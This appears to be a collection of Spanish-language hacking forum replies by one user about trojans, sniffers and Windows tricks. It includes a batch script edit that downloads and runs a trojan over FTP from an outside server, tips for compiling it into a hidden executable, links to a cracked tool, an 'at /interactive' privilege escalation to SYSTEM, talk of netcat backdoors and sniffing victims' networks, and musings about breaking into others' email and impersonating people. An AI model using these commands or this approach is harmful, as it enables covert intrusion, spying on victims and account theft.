generalmente todo el mundo al principio tiene ese error.. abrir un puerto no es nada.. en realidad lo que queres es habilitar un servicio... hay servicios como telnet que tiene su puerto por defecto y cuando pones a correr un servidor abre su o sus puertos, pero tambien podes hacer un programa que abra el puerto.. 9 por ejemplo y listo, pero y cuando este puerto reciba datos ¿quien los va a manipular si no hay un codigo detras para responder debidamente? por esto necesitarias un codigo batch que inicie un servicio.

los sniffer solo funcionan en una lan (hasta donde conozco) poniendo una maquina en modo promiscuo. ahora esto no quita que un troyano pueda usar tecnicas de sniffer para enviarte (a tu maquina que no este en la misma red de la vitima) informacion sobre todas las conexiones que esta haciendo la victima o toda la red lan donde se encuentra la victima, y de este modo ver por ejemplo desde esa lan remota todas las direcciones de las personas que usan mensajeria instantanea, datos de conexiones a servidores ftp, paginas visitadas y sus contenidos y datos por el estilo.

creo que el chico no entiende que cuando ejecute el server en su maquina este abre solo el puerto que va a estar en modo escucha a la espera de la peticion de conexion del cliente. Seguramente el server tiene una opcion para configurar el puerto que queres abrir o si esta por defecto solo tenes que ejecutar el server en tu maquina y listo. (no podes estar en un cyber con el server porque no se puede si estas detras de un router sin que hayas mapedos los puertos que vas a usar para dar el servicio)

ahh tendrias que haber empezado por ahi... lo que vas a tener que usar es una herramienta de cracking que se llama Controlador de ventanas v5.0 by Storm. Este programa tiene una opcion que dice Habilitar botones y hace precisamente eso, busca todos los botones (no hay que especificar ninguna ventana ni nada)y los pone en estado Enabled (habilitados) a mi me funciono de maravillas, pero hay veces que cuando uno habilita un boton aun no funciona como uno espera por mas clics que le haga, es cuestion de intentar.

aca esta el programa (entre otros)
http://www.hackemate.com.ar/mirrors/karpoff/herramie.htm

ya esta... era demasiado bueno  . Con el servidor ftp de windows no se puede realizar conexiones pasivas entonces si algun firewall esta activado este metodo no funciona.

jajaj si muy bueno, mis disculpas por mi f#cking miopia  de verdad me gusto mucho.


si alguien quiere usar otro troyano y otro server puede agregar entre la primera y la segunda linea
echo Usuario>> autox.txt
echo Password>> autox.txt
donde Usuario y Password son el nombre de usuario y el pass para logearse en el servidor ftp (el simbolo >> debe estar pegado al pass sino al final le va a agregar un espacio extra y no se va a iniciar sesion)

y sustituir

ftp -s:autox.txt -A serverhack.com

por

ftp -s:autox.txt ServerPropio.com

bueno y modificar un poco las lineas que ejecutan el troyano, pero eso depende de cada caso.

repito.. me gusto mucho 

PD:
si alguien quiera pasar el bat a exe y que no aparezca ninguna ventana cmd delatora (Options --> Ghost Aplication)

http://www.abyssmedia.com/quickbfc/
http://www.keygen.cc/crack/67767/

inicio --> ejecutar --> cmd.exe

escribis esto en la consola

time y dos veces enter

despues

at 12:05 /interactive cmd.exe

donde 12:05 es una hora uno o dos minutos despues de la hora actual que viste con el comando time

en uno o dos minutos se va a abrir una consola de comando com privilegios de sistema y escribis esto:

taskkill /f /im explorer.exe

y despues esto

start explorer.exe

listo.. privilegios de sistema.. hace click derecho sobre el escritorio, propiedades, escritorio, examinar... etc.

no entiendo como no podes hacer esto con solo con privilegios de admin.. supongo que no tenes habilidato el clic derecho en el escritorio (raro como admin), pero eso se puede sorter con un metodo mas sencillo

inicio --> ejecutar --> desk.cpl

en el registro es en local user... Control panel.. desktop... wallpaper o algo asi

eso me parece un poco cotradictorio, o penetrar es solo atravez de un bug?

yo creo que las posibilidades de  intrusion en un sistema hogareño no son nada bajas si sabes programar... falta poco para que mi maravilla vea la luz (chau firewalls, routers, ips dinamicas y demas problemas) jajjajaj ¿que lastima que no hay una carita con risa diabolica =  +  + 

si sin ser admin tenes acceso al comando "at" (para programar tareas) podes escalar privilegios hasta system y cambiar el fondo de escritorio. Sino yo intentaria con un archivo .reg para modificar el registro y colocar un nuevo valor para el fondo de escritorio (esto ultimo se me esta ocurriendo ahora, no pongo las manos en el fuego)

jaja cuando vi Backdoor en batch, no es por desmerecer, pero pense que era un verdadero backdoor en batch. Esto es unas lineas batch que ejecutan el netcat no es solo mandar el bat sino tambien hay que mandar el netcat. Un verdadero backdoor en batch seria uno que habilite el servicio telnet de windows xp por ejemplo (no tengo idea si es posible  ) una vez vi un exe muy chiquito que habilitaba ese servicio en el XP victima y uno se podia conectar sin necesidad del netcat solo con telnet desde la maquina atacante. pero siempre tiene ese problema, por lo menos para mi, de los nombres de user y pass para el servicio telnet.

pareciera que haces referencia a algo parecido al TRASHING


esto me hizo acordar una vez que "soñe" que entraba en algunos correos ajenos y encotraba entre los viejos mails correos de suscripciones a paginas y blogs con sus correspondientes pass y no solo esto sino que tambien en este "sueño" algunas personas usaban esos mismos pass para otros correos. 

con todo el respeto.. si me gustara la novia de alguien me haria un mail de "ella" y no de "el", fijate el descocierto que es capaz de generar este minimo detalle. Ademas sin andar haciendo problemas  por ahi tengo muchos mails de "ella" jajaj para ingenieria social, no piensen mal.
Lo que podes hacer es decirle a tu novia que vas a andar contando cosas falsas. mira: a un amigo le decis que engañaste a tu novia con una pelada, a otro que fue con una gorda, a otro etc. y a todos les decis que no le cuenten a nadie.. entonces cuando este "ente virtual" te quiera chantajear va a decirte que engañaste a tu novia con una mina con ciertas caracteristicas.. solo vas a tener que seguir la traza de la informacion y recordar a quien le dijiste esa caracteristica (gorda o pelada o lo que fuere)
(esto no es muy informatico que digamos  )

eso de driver externo es cuando dicen que un programa tiene mochila? o eso es otra cosa?

bueno, en lo que a sniffer en windows respecta este siempre siempre fue mi compañero de aventuras y nunca me dejo a pie 

http://www.networkactiv.com/PIAFCTM.html (esta la version 2.2, pero prefiero la 1.5)

fijensè que en el video cuando espian el correo electronico, el correo es enviado por el outlook, cualquiera que haya programado un cliente pop3 o smtp sabe que son faciles de sniffar, es que basicamente es como escribir comandos desde telnet, pero no creo que ese test del correo electronico hubiese salido tan lindo si hubiesen enviado el mail desde una pagina como yahoo o hotmail, donde la info no tiene que ir necesariamente por ahi en texto plano. Por eso cuando sniffen un cliente de msn solo van a poder ver que escribe el que esta en su propia red, porque lo que llega al msn esta encriptado y el cliente lo desencripta y muestra. (incluso todo podria estar encriptado, no se porque no es asi).
Lo del html es muy cierto.. solo eso y mmm me deja un poco de dudas eso de poder ver pass con un sniffer seguro que despues te tendrias que pasar 2000 millones de años al calor de la mas pura fuerza bruta para descifrar un pass sniffado.

esto es la base el resto depende de vos

http://allapi.mentalis.org/apilist/64BED1F862145FDD4477424686646320.html